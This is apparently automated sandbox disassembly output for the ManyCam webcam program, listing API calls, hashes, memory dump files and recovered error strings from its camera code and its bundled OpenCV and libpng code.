                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$Image
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1237808576-0
                                                                                                                                            • Opcode ID: ae6bf935b923b4879af12b20d1e7ba834aac778abf3f025c7bd5bd2a014dc142
                                                                                                                                            • Instruction ID: 61334a59a6328505146fa154266dd27d5a2e39e93b606410563eabcbac9550f4
                                                                                                                                            • Opcode Fuzzy Hash: ae6bf935b923b4879af12b20d1e7ba834aac778abf3f025c7bd5bd2a014dc142
                                                                                                                                            • Instruction Fuzzy Hash: 225106B0A81B027AF67057719E0BB9326912B26B01F050539BB4DB83C6FBF59521CA99
                                                                                                                                            Strings
                                                                                                                                            • Such camera is already in the list: %s, xrefs: 004B8AC7
                                                                                                                                            • Creating the graph for camera %s, xrefs: 004B8C3E
                                                                                                                                            • CManyCamGraphMgr::AddCameraInput, xrefs: 004B8995
                                                                                                                                            • Destroy the graph for camera %s, xrefs: 004B8B94
                                                                                                                                            • Graph creation failed with hr=%X, xrefs: 004B8E3F
                                                                                                                                            • Moniker is NULL., xrefs: 004B89FF
                                                                                                                                            • Failed to create the graph with hr=%X, xrefs: 004B8C85
                                                                                                                                            • Desired frame size is invalid., xrefs: 004B8A49
                                                                                                                                            • Creating new entry for camera %s, xrefs: 004B8D86
                                                                                                                                            • Error: camera name is empty., xrefs: 004B89BB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: clock$AllocatorDebugHeapfflushfwprintf
                                                                                                                                            • String ID: CManyCamGraphMgr::AddCameraInput$Creating new entry for camera %s$Creating the graph for camera %s$Desired frame size is invalid.$Destroy the graph for camera %s$Error: camera name is empty.$Failed to create the graph with hr=%X$Graph creation failed with hr=%X$Moniker is NULL.$Such camera is already in the list: %s
                                                                                                                                            • API String ID: 2739697835-1067953073
                                                                                                                                            • Opcode ID: 8320536623643fb9a82ccd93883c4b51503a044c0bfe6443a3796fe1dcf3ba29
                                                                                                                                            • Instruction ID: 0c2db78db8441f90a5655b608386306daf3177cd87543fca05d57ae7838a8fe2
                                                                                                                                            • Opcode Fuzzy Hash: 8320536623643fb9a82ccd93883c4b51503a044c0bfe6443a3796fe1dcf3ba29
                                                                                                                                            • Instruction Fuzzy Hash: F5024C70900208EFDB14EF95CC92BEEBBB5BF54304F10415EE5066B2D2DB786A45CBA9
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012A4,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032CA
                                                                                                                                              • Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012A8,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032DC
                                                                                                                                              • Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012AC,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032EA
                                                                                                                                              • Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C0,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403302
                                                                                                                                              • Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C4,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403314
                                                                                                                                              • Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C8,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403326
                                                                                                                                            • cvReleaseMat.CXCORE099(00000118,?), ref: 00402ED9
                                                                                                                                            • cvReleaseMat.CXCORE099(00000114), ref: 00402EEB
                                                                                                                                            • cvReleaseMat.CXCORE099(0000011C), ref: 00402EFD
                                                                                                                                            • cvReleaseMat.CXCORE099(00000120), ref: 00402F0F
                                                                                                                                            • cvReleaseMat.CXCORE099(00000124), ref: 00402F21
                                                                                                                                            • cvReleaseMat.CXCORE099(00000128), ref: 00402F33
                                                                                                                                            • cvReleaseMat.CXCORE099(0000012C), ref: 00402F45
                                                                                                                                            • cvReleaseMat.CXCORE099(00000130), ref: 00402F57
                                                                                                                                            • cvReleaseMat.CXCORE099(00000134), ref: 00402F69
                                                                                                                                            • cvReleaseMat.CXCORE099(00000100), ref: 00402F77
                                                                                                                                            • cvReleaseMat.CXCORE099(00000104), ref: 00402F89
                                                                                                                                            • cvReleaseMat.CXCORE099(00000110), ref: 00402F9B
                                                                                                                                            • cvReleaseMat.CXCORE099(00000108), ref: 00402FAD
                                                                                                                                            • cvReleaseMat.CXCORE099(0000010C), ref: 00402FBF
                                                                                                                                            • cvReleaseMat.CXCORE099(00000138), ref: 00402FD1
                                                                                                                                            • cvReleaseMat.CXCORE099(0000013C), ref: 00402FE3
                                                                                                                                            • cvReleaseMat.CXCORE099(00000140), ref: 00402FF5
                                                                                                                                            • cvReleaseMat.CXCORE099(00000144), ref: 00403007
                                                                                                                                            • cvReleaseMat.CXCORE099(00000148), ref: 00403019
                                                                                                                                            • cvReleaseMat.CXCORE099(0000014C), ref: 0040302C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Release$Image
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1442443227-0
                                                                                                                                            • Opcode ID: 18739cc84c4e819f13137b706e7aec6c30c3c301381e9e13cdbf496b20ef20f3
                                                                                                                                            • Instruction ID: e9e9c9bdbcc23bd9ce4fc92c64f6ef92138ef717c9158f18fb2c09d524048864
                                                                                                                                            • Opcode Fuzzy Hash: 18739cc84c4e819f13137b706e7aec6c30c3c301381e9e13cdbf496b20ef20f3
                                                                                                                                            • Instruction Fuzzy Hash: 3A415AB1C01B11ABDA70DB60D94EB97B6EC7F01300F44493E914B929D0EB79F658CAA3
                                                                                                                                            APIs
                                                                                                                                            • cvGetMat.CXCORE099(?,?,00000000,00000000), ref: 00B92C6F
                                                                                                                                            • cvGetErrStatus.CXCORE099 ref: 00B92C79
                                                                                                                                            • cvError.CXCORE099(000000FF,cvSaveImage,Inner function failed.,.\loadsave.cpp,000001C4), ref: 00B92C98
                                                                                                                                            • cvError.CXCORE099(000000F1,cvSaveImage,00BDD488,.\loadsave.cpp,000001CB), ref: 00B92CEB
                                                                                                                                            • cvError.CXCORE099(000000FE,cvSaveImage,could not save the image,.\loadsave.cpp,000001D9), ref: 00B92D1C
                                                                                                                                            • cvFlip.CXCORE099(?,?,00000000), ref: 00B92D44
                                                                                                                                            • cvGetErrStatus.CXCORE099(?,?,?,?,?,?,?,?,?,?,?,?,?,00B92287,?,?), ref: 00B92D4E
                                                                                                                                            • cvFlip.CXCORE099(00000000,00000000,00000000), ref: 00B92D6D
                                                                                                                                            • cvGetErrStatus.CXCORE099(?,?,?), ref: 00B92D75
                                                                                                                                            • cvError.CXCORE099(000000E5,cvSaveImage,null filename,.\loadsave.cpp,000001C2), ref: 00B92DEA
                                                                                                                                            • cvGetErrStatus.CXCORE099 ref: 00B92DF2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorStatus$Flip
                                                                                                                                            • String ID: .\loadsave.cpp$Inner function failed.$could not find a filter for the specified extension$could not save the image$cvSaveImage$null filename
                                                                                                                                            • API String ID: 2640733558-2883540358
                                                                                                                                            • Opcode ID: 4c5e0771d07e20323fbdc083f66435f272a4439b9e604bd6e80e63cd0c9c9bed
                                                                                                                                            • Instruction ID: bb5bd88270fc64c14f95fc2dc916111891dfa52a60ddc3ed75485787b08364a1
                                                                                                                                            • Opcode Fuzzy Hash: 4c5e0771d07e20323fbdc083f66435f272a4439b9e604bd6e80e63cd0c9c9bed
                                                                                                                                            • Instruction Fuzzy Hash: 6B415571E803107BDE24AB188C52F6EB7D9DF98B50F1441FAFC55673D2E2B1E84486A2
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004A8F0A
                                                                                                                                              • Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E
                                                                                                                                              • Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5
                                                                                                                                            • wcscmp.MSVCR80 ref: 004A8F3A
                                                                                                                                            • wcscmp.MSVCR80 ref: 004A8F53
                                                                                                                                            • wcscmp.MSVCR80 ref: 004A8F80
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004A92EC
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004A9304
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004A9324
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$wcscmp$FileFindFirst
                                                                                                                                            • String ID: InternalProperties
                                                                                                                                            • API String ID: 1222566788-1350816593
                                                                                                                                            • Opcode ID: c6da74deea4d9cd51fd66fbdb8e43503fd6c04aced2bb07cda00fcb46decaaae
                                                                                                                                            • Instruction ID: d461dac8b76a5e630202117bde1037354cd356562fc5738dbdf76f67a61ac83d
                                                                                                                                            • Opcode Fuzzy Hash: c6da74deea4d9cd51fd66fbdb8e43503fd6c04aced2bb07cda00fcb46decaaae
                                                                                                                                            • Instruction Fuzzy Hash: 30F13AB49001199FDB14DF54CC94BAEB7B5BF55304F1085DAEA0AA7381DB34AE88CF68
                                                                                                                                            APIs
                                                                                                                                            • cvCreateMat.CXCORE099(?,?,?), ref: 00B92AD3
                                                                                                                                            • cvGetErrStatus.CXCORE099 ref: 00B92ADF
                                                                                                                                            • cvCreateImage.CXCORE099(?,?,00000008,?), ref: 00B92AF4
                                                                                                                                            • cvGetErrStatus.CXCORE099 ref: 00B92B00
                                                                                                                                            • cvError.CXCORE099(000000FF,cvLoadImage,Inner function failed.,.\loadsave.cpp,00000189), ref: 00B92B1F
                                                                                                                                            • cvGetMat.CXCORE099(?,?,00000000,00000000), ref: 00B92B37
                                                                                                                                            • cvReleaseMat.CXCORE099(?), ref: 00B92B6A
                                                                                                                                            • cvGetErrStatus.CXCORE099(?,?,?,?,?,?,?,00B92BFF,00000000,00B92123,?,?), ref: 00B92B7D
                                                                                                                                            • cvReleaseMat.CXCORE099 ref: 00B92B93
                                                                                                                                            • cvReleaseImage.CXCORE099(?), ref: 00B92BB2
                                                                                                                                            • cvError.CXCORE099(000000E5,cvLoadImage,null filename,.\loadsave.cpp,00000174,?,?,?,?,?,?,?,00B92BFF,00000000,00B92123,?), ref: 00B92BCF
                                                                                                                                            • cvReleaseImage.CXCORE099(?), ref: 00B92BDE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Release$ImageStatus$CreateError
                                                                                                                                            • String ID: .\loadsave.cpp$Inner function failed.$cvLoadImage$null filename
                                                                                                                                            • API String ID: 3787916741-4128775367
                                                                                                                                            • Opcode ID: 634642ce48e0209415a6f409255ebfd79e817705e24d1733f8db888929997c05
                                                                                                                                            • Instruction ID: 4fd236d01a7ddc29cb1e2944016642a8a080f688506ec4265cf43fdbf0a7b267
                                                                                                                                            • Opcode Fuzzy Hash: 634642ce48e0209415a6f409255ebfd79e817705e24d1733f8db888929997c05
                                                                                                                                            • Instruction Fuzzy Hash: 6D41C2B19043007BDF20EF25CC42F6AB7D59F94710F1889F9F49947292E735E9098792
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • white_x=%f, white_y=%f, xrefs: 00BC0452
                                                                                                                                            • Invalid cHRM red point specified, xrefs: 00BC0415
                                                                                                                                            • Invalid cHRM white point specified, xrefs: 00BC042B
                                                                                                                                            • cHRM, xrefs: 00BC03D3
                                                                                                                                            • Invalid cHRM green point specified, xrefs: 00BC03FF
                                                                                                                                            • Invalid cHRM blue point specified, xrefs: 00BC03E9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _ftol$fprintf
                                                                                                                                            • String ID: Invalid cHRM blue point specified$Invalid cHRM green point specified$Invalid cHRM red point specified$Invalid cHRM white point specified$cHRM$white_x=%f, white_y=%f
                                                                                                                                            • API String ID: 3291409459-3520686153
                                                                                                                                            • Opcode ID: 9e220e80cd3a152a743ebf6b958aa87b44018f042b26d66631b970bf85d37787
                                                                                                                                            • Instruction ID: ef0e694ddc1fc45a01d09d85eaf00abe3a3232ef785e71385f36c5b170620622
                                                                                                                                            • Opcode Fuzzy Hash: 9e220e80cd3a152a743ebf6b958aa87b44018f042b26d66631b970bf85d37787
                                                                                                                                            • Instruction Fuzzy Hash: 88717CB140465AE3EB04BB40EE2DAABBBF8FFC9780F040A99F1D511165EFB5D4958702
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(000000E5,cvShowImage,NULL name,.\window_w32.cpp,0000026B), ref: 00B951BF
                                                                                                                                            • cvGetMat.CXCORE099(?,?,00000000,00000000), ref: 00B95211
                                                                                                                                            • cvGetErrStatus.CXCORE099 ref: 00B9521F
                                                                                                                                            • cvError.CXCORE099(000000FF,cvShowImage,Inner function failed.,.\window_w32.cpp,00000274), ref: 00B9523E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Error$Status
                                                                                                                                            • String ID: .\window_w32.cpp$Inner function failed.$NULL name$cvShowImage
                                                                                                                                            • API String ID: 483703942-1490608787
                                                                                                                                            • Opcode ID: ba539ed09172e7520002fe2abba57de94d8b08ac515c272f822029af0a9c36ac
                                                                                                                                            • Instruction ID: 4ce69bc61eb7b2099568027050c7495b4d021fee2d497e247b0fa058542f73d8
                                                                                                                                            • Opcode Fuzzy Hash: ba539ed09172e7520002fe2abba57de94d8b08ac515c272f822029af0a9c36ac
                                                                                                                                            • Instruction Fuzzy Hash: B851B3B2648300AFDB20DF64DC81F5BB7E8EBD8704F04496DF58997291E770E9058BA6
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0050665D
                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 0050669D
                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 005066AE
                                                                                                                                              • Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795
                                                                                                                                            Strings
                                                                                                                                            • The Resource File is corrupted. Please select another., xrefs: 00506718
                                                                                                                                            • The Resource File is corrupted. Please select another., xrefs: 0050666C
                                                                                                                                            • You have selected a file with the size larger than 3Mb., xrefs: 005066B4
                                                                                                                                            • You have selected an image with the dimension larger than 3000x2000., xrefs: 0050676F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$AllocatorCloseCreateDebugHandleHeapSize
                                                                                                                                            • String ID: The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$You have selected a file with the size larger than 3Mb.$You have selected an image with the dimension larger than 3000x2000.
                                                                                                                                            • API String ID: 1278540365-1045440647
                                                                                                                                            • Opcode ID: a2995053e53532cd3cc61e84a4e3e243a16d3489957e33b38d496d8e3a878c98
                                                                                                                                            • Instruction ID: bf2e516d7632956263a6d0b7edc6ab055445a249ca0629827ad9313cad8a857e
                                                                                                                                            • Opcode Fuzzy Hash: a2995053e53532cd3cc61e84a4e3e243a16d3489957e33b38d496d8e3a878c98
                                                                                                                                            • Instruction Fuzzy Hash: 3D513C70900259ABDB25EF14DC55BEDBBB0FF45704F1085AAF819AB2D0CB75AE84CB80
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Invalid cHRM green point, xrefs: 00BBCBE2
                                                                                                                                            • Incorrect cHRM chunk length, xrefs: 00BBC7E2
                                                                                                                                            • Invalid cHRM blue point, xrefs: 00BBCBC5
                                                                                                                                            • Ignoring incorrect cHRM value when sRGB is also present, xrefs: 00BBCA97
                                                                                                                                            • Invalid cHRM red point, xrefs: 00BBCBFF
                                                                                                                                            • Missing PLTE before cHRM, xrefs: 00BBC79A
                                                                                                                                            • Duplicate cHRM chunk, xrefs: 00BBC7BB
                                                                                                                                            • Invalid cHRM after IDAT, xrefs: 00BBC777
                                                                                                                                            • Invalid cHRM white point, xrefs: 00BBCC1C
                                                                                                                                            • wx=%f, wy=%f, rx=%f, ry=%f, xrefs: 00BBCAD6
                                                                                                                                            • gx=%f, gy=%f, bx=%f, by=%f, xrefs: 00BBCB0F
                                                                                                                                            • Missing IHDR before cHRM, xrefs: 00BBC766
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: fprintf
                                                                                                                                            • String ID: Duplicate cHRM chunk$Ignoring incorrect cHRM value when sRGB is also present$Incorrect cHRM chunk length$Invalid cHRM after IDAT$Invalid cHRM blue point$Invalid cHRM green point$Invalid cHRM red point$Invalid cHRM white point$Missing IHDR before cHRM$Missing PLTE before cHRM$gx=%f, gy=%f, bx=%f, by=%f$wx=%f, wy=%f, rx=%f, ry=%f
                                                                                                                                            • API String ID: 383729395-3711243189
                                                                                                                                            • Opcode ID: 9eb3e017c56c4ca1ebb05818c9febe57aaeb7cf967258a0f0624f3dd6be044df
                                                                                                                                            • Instruction ID: 6c0877a0d9dad76b35869a9d9994040e9bb660a2dd9a2cb0790d9ed4eea2d9b9
                                                                                                                                            • Opcode Fuzzy Hash: 9eb3e017c56c4ca1ebb05818c9febe57aaeb7cf967258a0f0624f3dd6be044df
                                                                                                                                            • Instruction Fuzzy Hash: A7C1E3726042089FD310FB19D88ADFEBFE8EF84314F80499DF58492192DBF5956887A7
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040FA80: List.LIBCMTD ref: 0040FA8A
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0040C2DC
                                                                                                                                              • Part of subcall function 004DBD20: Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 004DBD89
                                                                                                                                            • Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 0040C305
                                                                                                                                              • Part of subcall function 004DB530: _DebugHeapAllocator.LIBCPMTD ref: 004DB54A
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0040C35E
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0040C371
                                                                                                                                              • Part of subcall function 004DAFB0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004DB014
                                                                                                                                            • _snwprintf.MSVCR80 ref: 0040C591
                                                                                                                                            • wcslen.MSVCR80 ref: 0040C59E
                                                                                                                                            • wcscpy.MSVCR80 ref: 0040C5CE
                                                                                                                                            • wcslen.MSVCR80 ref: 0040C5DB
                                                                                                                                              • Part of subcall function 0040F760: _invalid_parameter_noinfo.MSVCR80(00000000,?,00409D5D,?,?,00000000,?,?,?,mce,?,?,?,?,?,?), ref: 0040F774
                                                                                                                                            • wcscat.MSVCR80 ref: 0040C633
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
